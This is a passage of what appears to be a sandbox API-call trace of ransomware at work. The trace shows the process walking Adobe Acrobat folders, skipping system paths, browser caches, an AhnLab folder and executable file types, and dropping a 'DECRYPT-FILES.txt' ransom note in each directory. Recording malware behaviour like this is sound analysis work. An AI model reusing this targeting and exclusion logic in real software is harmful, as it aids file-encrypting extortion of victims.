lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\0a16c9.tmp" [0179.796] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.796] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.796] CloseHandle (hObject=0x0) returned 0 [0179.796] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.797] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9f48400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Collab", cAlternateFileName="")) returned 1 [0179.797] lstrcmpW (lpString1="Collab", lpString2=".") returned 1 [0179.797] lstrcmpW (lpString1="Collab", lpString2="..") returned 1 [0179.797] lstrcatW (in: lpString1="Collab", lpString2="\\" | out: lpString1="Collab\\") returned="Collab\\" [0179.797] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpString2="Collab\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\" [0179.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\Program Files") returned 0x0 [0179.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch=":\\Windows") returned 0x0 [0179.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\Games\\") returned 0x0 [0179.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\All Users") returned 0x0 [0179.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="AhnLab") returned 0x0 [0179.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.797] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\") returned 72 [0179.797] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.797] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\\\0a16c9.tmp") returned 83 [0179.797] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\collab\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0179.800] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\") returned 72 [0179.800] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.800] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\\\DECRYPT-FILES.txt") returned 90 [0179.801] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\collab\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.801] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\") returned 72 [0179.801] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*" [0179.801] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9f48400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee4c1480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee4c1480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0179.801] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.801] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9f48400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee4c1480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee4c1480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.801] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.801] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.801] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee4c1480, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee4c1480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee4c1480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0179.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0179.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0179.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0179.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0179.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0179.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0179.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0179.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0179.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0179.801] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0179.801] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.801] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0179.801] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0179.801] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0179.801] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0179.801] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\") returned 72 [0179.801] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.802] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\" [0179.802] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\0a16c9.tmp" [0179.802] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.802] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\collab\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.802] CloseHandle (hObject=0x0) returned 0 [0179.802] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.802] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f498c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f6fa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.802] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.802] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f498c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f6fa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.802] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0179.802] CloseHandle (hObject=0x27c) returned 1 [0179.802] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f498c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.803] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.803] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9df17a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xa9f6fa20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f6fa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Forms", cAlternateFileName="")) returned 1 [0179.803] lstrcmpW (lpString1="Forms", lpString2=".") returned 1 [0179.803] lstrcmpW (lpString1="Forms", lpString2="..") returned 1 [0179.803] lstrcatW (in: lpString1="Forms", lpString2="\\" | out: lpString1="Forms\\") returned="Forms\\" [0179.803] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpString2="Forms\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\" [0179.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\Program Files") returned 0x0 [0179.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch=":\\Windows") returned 0x0 [0179.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\Games\\") returned 0x0 [0179.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\All Users") returned 0x0 [0179.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="AhnLab") returned 0x0 [0179.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.803] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\") returned 71 [0179.803] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.803] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\\\0a16c9.tmp") returned 82 [0179.803] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\forms\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0179.804] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\") returned 71 [0179.804] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.804] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\\\DECRYPT-FILES.txt") returned 89 [0179.804] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\forms\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.805] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\") returned 71 [0179.805] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*" [0179.805] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9df17a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee4c1480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee4c1480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0179.806] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.806] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9df17a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee4c1480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee4c1480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.806] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.806] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.806] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee4c1480, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee4c1480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee4c1480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0179.806] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0179.806] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0179.806] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0179.806] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0179.806] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0179.806] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0179.806] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0179.806] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0179.806] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0179.806] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0179.806] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.806] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0179.806] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0179.806] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0179.806] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0179.806] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\") returned 71 [0179.806] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.806] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\" [0179.806] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\0a16c9.tmp" [0179.806] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.807] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\forms\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.807] CloseHandle (hObject=0x0) returned 0 [0179.807] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.807] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f6fa20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f6fa20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f6fa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.807] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.807] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f6fa20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f6fa20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f6fa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.807] FindClose (in: 